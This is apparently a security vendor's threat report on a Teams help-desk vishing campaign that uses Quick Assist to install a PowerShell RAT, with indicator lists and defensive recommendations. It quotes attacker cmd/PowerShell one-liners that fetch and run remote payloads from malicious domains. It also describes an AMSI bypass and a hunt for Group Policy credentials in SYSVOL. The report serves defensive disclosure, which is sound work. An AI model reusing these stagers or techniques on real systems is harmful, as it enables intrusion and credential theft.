Quick, You Need Assistance!

In September 2025, Field Effect began tracking a Microsoft Teams voice-phishing (vishing) campaign leveraging Quick Assist, a remote administration tool that comes pre-installed by default on many modern versions of Windows including Windows 11.

Quick Assist enables a remote user to view and control the user’s computer. It has its own keyboard shortcut, Ctrl-Win-Q, which will either start the application or prompt the user to install it from the Microsoft Store. 

In this campaign, threat actors were observed using Quick Assist to deliver a PowerShell web-socket remote access trojan (RAT).

Initial access

Initial access is achieved through a help desk scam aimed at a small number of users within targeted organizations. The user receives an inbound Microsoft Teams voice call from a third-party caller, typically using the display name “Help Desk,” intended to impersonate the organization’s IT team.

During the call, the user is told there is an issue with their computer and is instructed to connect via Quick Assist, which the attacker then uses to gain a foothold on the system. The scale observed by Field Effect indicates that this phase of the activity is automated.

The third-party caller comes from rapidly rotating M365 tenants, using the ‘onmicrosoft.com’ default domains, with subdomains referring to IT and cybersecurity terms such as:

• certifieditsec[.]onmicrosoft[.]com
• systemharden[.]onmicrosoft[.]com

The speed of new tenants appearing demonstrates that the actor has the capability to rapidly bypass Microsoft security protocols to create new M365 accounts. The usernames for the accounts used also rapidly rotate, with Field Effect observing common patterns of re-use across the tenants. Some examples are:

• help
• it
• itadmin
• itadministrator
• ithelp
• helpdesk
• ithelpdesk
• systemsadmin

Notably, Microsoft Teams will warn users when inbound chat messages originate from a suspicious third-party tenant, however the capability to notify on suspicious incoming voice calls is due to be rolled out in February 2026.

Field Effect has reported all the M365 tenants observed in this campaign to Microsoft for further investigation.

During the vishing attack, the user is prompted to run a Quick Assist remote session. Once the threat actor has access to the host, the attacker will first conduct user group enumeration with the commands:

• net  group /dom
• whoami  /groups

Following this, a PowerShell script is launched, via cmd.exe, which downloads and executes the next stage of the attack, command and control (C2).

Since early November 2025, the following two commands have been observed:

cmd.exe /c "echo $wo=New-Object System.Net.WebClient;[Net.ServicePointManager]::SecurityProtocol='Tls12';$wo.DownloadString('hxxps://prosearium[.]net/setting.pdf') | powershell.exe -NoProfile - | powershell.exe -NonInteractive -NoProfile -WindowStyle hidden -"

and

"C:\WINDOWS\system32\cmd.exe" /c start "" /min powershell.exe -WindowStyle Hidden -Command "$wo=New-Object System.Net.WebClient;[Net.ServicePointManager]::SecurityProtocol='Tls12';$wo.DownloadString('hxxps://aerobionix[.]com/generation.pdf')|powershell.exe -NoProfile -WindowStyle Hidden -" & start "" "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"

(Note: Domain names change over time).

This infographic demonstrates the full initial access process:

Command and control

The previous command downloads and executes a heavily obfuscated PowerShell payload from domains hosted on M247. Notably most of the domains seen used in this stage do not appear to be newly registered.

Once deciphered, the PowerShell script contains the following three components:

• The first is Antimalware Scan Interface (AMSI) bypass functionality which patches the “AmsiScanBuffer” string in the Common Language Runtime library (“clr.dll”) loaded in memory.
• The second component is a function that combines a keyed XOR cipher with base64 encoding to encrypt and decrypt strings.
• The final piece of code sends the C2 server metadata about the host and retrieves the second stage payload. This functionality uses a hard-coded UserAgent when retrieving the second payload. It is possible that the C2 server inspects the UserAgent to filter out requests that do not originate from real victims, such as researchers.

At this stage, an encoded PowerShell web-socket remote access trojan is downloaded and executed. This connects to the same C2 server as the previous step and grants the threat actor remote access to the infected host.

This web-socket RAT has the same system reconnaissance function and user agent check as the RAT documented in SentinelOne’s PhantomCaptcha blog. At this point, the attacker has the capability to run any commands they wish on the victim's computer.

Infrastructure and IoCs

The threat actor has been observed using the following tenants, IPs, and domains to host C2 infrastructure:

Tenants:

• certifieditengineering.onmicrosoft[.]com
• certifieditsec.onmicrosoft[.]com

• certifieditsecurity.onmicrosoft[.]com

• certifiednetupdate.onmicrosoft[.]com
• certifiedvpnsecurity.onmicrosoft[.]com
• enterprisegradesecurities.onmicrosoft[.]com
• enterpriseitmonitoringewf12.onmicrosoft[.]com
• enterprisesecsolutions.onmicrosoft[.]com
• enterprisesecurityanalysis.onmicrosoft[.]com
• incidentresponseit.onmicrosoft[.]com
• infrastructurefirewall.onmicrosoft[.]com
• infrastructureinternal.onmicrosoft[.]com
• internalnetsolution.onmicrosoft[.]com
• internalvpnsolution.onmicrosoft[.]com
• itsecuritycertified.onmicrosoft[.]com
• mandatorynetsecurity.onmicrosoft[.]com
• mandatorynetworkmonitoring.onmicrosoft[.]com
• mandatoryvirtualprivatenet.onmicrosoft[.]com
• mandatoryvpnsec.onmicrosoft[.]com
• officesups365.onmicrosoft[.]com
• onsupport365.onmicrosoft[.]com
• privatenetaudit.onmicrosoft[.]com
• privatenethardening.onmicrosoft[.]com
• securityanalysisenterprise.onmicrosoft[.]com
• systemharden.onmicrosoft[.]com
• systemhardeningwefewweggwer.onmicrosoft[.]com

IPs:

• 162.252.172[.]102
• 162.252.172[.]83
• 165.172.252[.]162
• 162.252.172[.]21
• 164.173.252[.]162
• 162.252.174[.]119
• 149.154.158[.]86
• 162.252.173[.]45
• 162.252.172[.]16
• 162.252.172[.]245
• 162.252.172[.]74

Domains:

• Elaantravel[.]com
• Saidozdemir[.]com
• Halungroup[.]com
• j4jobspk[.]com
• ibizers[.]com
• aerobionix[.]com
• prosearium[.]net
• flyskyenterprise[.]com
• mdbelaluddin[.]com
• khanvas[.]com
• maxolutions243[.]com

Observed incidents

In a compromise in late September 2025, we first observed the PowerShell command format reaching out to the ‘aeobionix[.]com’ domain.

In this case, the threat actor installed AnyDesk before performing user group discovery. They then ran the PowerShell stager to execute the web-socket RAT before downloading the NetSupport Manager and setting a run key to execute it as another form of persistent access.

The NetSupport Manager process and run key were detected and removed by Defender shortly after the run key was set.

The threat actor then checked what antivirus was installed using the Windows Management Instrumentation Command-line (WMIC). After, they attempted to search the SYSVOL share for `sPwd` and `cpassword` strings to try to find credentials potentially stored in Group Policy Preferences.

These attempts were blocked by Field Effect MDR, and the hosts isolated.

Stay on top of emerging threats like this.

Sign up to receive a weekly roundup of our security intelligence feed. You'll be the first to know of emerging attack vectors, threats, and vulnerabilities. 

Sign up

In another case, the attempt to run the PowerShell load was blocked and the threat actor updated the local VPN client configuration of the compromised host to a new destination. This may have been an attempt to steal the user’s VPN client information, or an attempt to add a backdoor to the network.

Attribution

Many of the techniques observed in this campaign overlap with previously reported activity.

• The vishing initial access component overlaps with Storm-1811 reporting by Microsoft. This group is likely operating as an Initial Access Broker (IAB) based on the differing outcomes observed. An IAB would sell successfully gained access, often via a dark web marketplace.

• The second stage RAT observed has many similarities to the SentinelOne report on PhantomCaptcha, as mentioned earlier. However, that report ties the activity to an attack on Ukraine from Russian-sourced infrastructure. This is different from the activity observed here.

We assess it's likely that we're observing a complex cybercrime ecosystem where victims and tooling (malware) is shared or sold to different attackers for them to execute for varying outcomes.

It's also likely that the activity we're observing has the intention of deploying ransomware, however all Field Effect observations of the activity have been successfully blocked.

MITRE ATT&CK

Field Effect AROs

• Field Effect EDR blocked execution, generated AROs, and contained the incidents in observed cases.

• We have created a new cloud ARO for suspicious remote Teams messages in response to this threat. This ARO notifies clients as soon as one of these suspicious external Teams messages is observed. 

Recommendations

• Review Microsoft Teams Security Best Practices and restrict inbound messaging from unknown tenants.

• Raise awareness. Add Teams chat-based social engineering attacks, including voice-phishing (vishing), to your cybersecurity awareness programs.

• Uninstall or use application whitelisting to restrict access to Quick Assist where not necessary.

• Monitor for the anomalous installation of Remote Management (RMM) tools though EDR tooling, such as Field Effect MDR.